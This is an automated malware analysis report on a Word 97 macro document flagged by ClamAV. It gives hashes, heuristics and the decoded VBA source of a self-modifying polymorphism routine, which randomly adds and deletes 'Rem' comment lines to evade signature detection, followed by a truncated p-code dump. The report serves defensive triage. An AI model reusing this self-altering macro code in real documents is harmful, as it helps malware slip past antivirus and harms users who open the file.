Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf7fe48b7a5c2b9b…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-06-11 16:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8fca267d78e1c5e7ff3c61f8c729c3b0 SHA-1: 91aee742a192da03d39a026731cf2ce9a555dd3a SHA-256: cf7fe48b7a5c2b9bc7d88bd5f17c4171d727c91a6ea14aa59b2a24fb3962fa26
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an Office document containing VBA macros. The 'SomePolymorphicSystem' subroutine within the 'SPS' module exhibits polymorphic behavior by adding or removing 'Rem' lines, likely to evade signature-based detection. While no direct payload or network communication is evident from the provided script, this obfuscation technique strongly suggests malicious intent, possibly to download and execute a second-stage payload.

Heuristics 2

  • ClamAV: Win.Tool.W97M-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Tool.W97M-4
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4530 bytes
SHA-256: 7855ba1d64903c2be1279e23b86877015190fceb1360e7eb2021dcdf9b99bf9a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SPS"
Sub SomePolymorphicSystem()
Randomize
AktuelleZeilenAnzahl = Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.CountOfLines
If AktuelleZeilenAnzahl > 76 Then
    Kleiner = Int(Rnd * (AktuelleZeilenAnzahl - 26))
        For ii = 1 To AktuelleZeilenAnzahl
            If Left(Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.Lines(ii, 1), 3) = "Rem" Then
                Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.DeleteLines ii
                x = x + 1
                If x = Kleiner Then Exit For
            End If
        Next
Else
PolySize = Int(Rnd * 10) + 1
    For PolyMorphic = 1 To PolySize
        PolyString = ""
        PolyLines = Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.CountOfLines
        RndLine = Int(Rnd * PolyLines) + 1
        StringSize = Int(Rnd * 39) + 1
            For SomeString = 1 To StringSize
                PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
            Next SomeString
        Application.VBE.ActiveVBProject.VBComponents("SPS").CodeModule.InsertLines RndLine, "Rem " & PolyString
    Next PolyMorphic
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/e2e2371f048544a7b77f6846bb670392.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1199 bytes
' Macros/VBA/SPS - 5948 bytes
' Line #0:
' 	FuncDefn (Sub SomePolymorphicSystem())
' Line #1:
' 	ArgsCall Read 0x0000 
' Line #2:
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St AktuelleZeilenAnzahl 
' Line #3:
' 	Ld AktuelleZeilenAnzahl 
' 	LitDI2 0x004C 
' 	Gt 
' 	IfBlock 
' Line #4:
' 	Ld Rnd 
' 	Ld AktuelleZeilenAnzahl 
' 	LitDI2 0x001A 
' 	Sub 
' 	Paren 
' 	Mul 
' 	FnInt 
' 	St Kleiner 
' Line #5:
' 	StartForVariable 
' 	Ld ii 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AktuelleZeilenAnzahl 
' 	For 
' Line #6:
' 	Ld ii 
' 	LitDI2 0x0001 
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Rem"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	Ld ii 
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0001 
' Line #8:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	St x 
' Line #9:
' 	Ld x 
' 	Ld Kleiner 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFor 
' 	EndIf 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	ElseBlock 
' Line #13:
' 	Ld Rnd 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St PolySize 
' Line #14:
' 	StartForVariable 
' 	Ld PolyMorphic 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld PolySize 
' 	For 
' Line #15:
' 	LitStr 0x0000 ""
' 	St PolyString 
' Line #16:
' 	LitStr 0x0003 "SPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St PolyLines 
' Line #17:
' 	Ld Rnd 
' 	Ld PolyLines 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St RndLine 
' Line #18:
' 	Ld Rnd 
' 	LitDI2 0x0027 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St StringSize 
' Line #19:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StringSize 
' 	For 
' Line #20:
' 	Ld PolyString 
' 	LitDI2 0x0041 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x007A 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St PolyString 
' Line #21:
' 	StartForVariable 
'
... (truncated)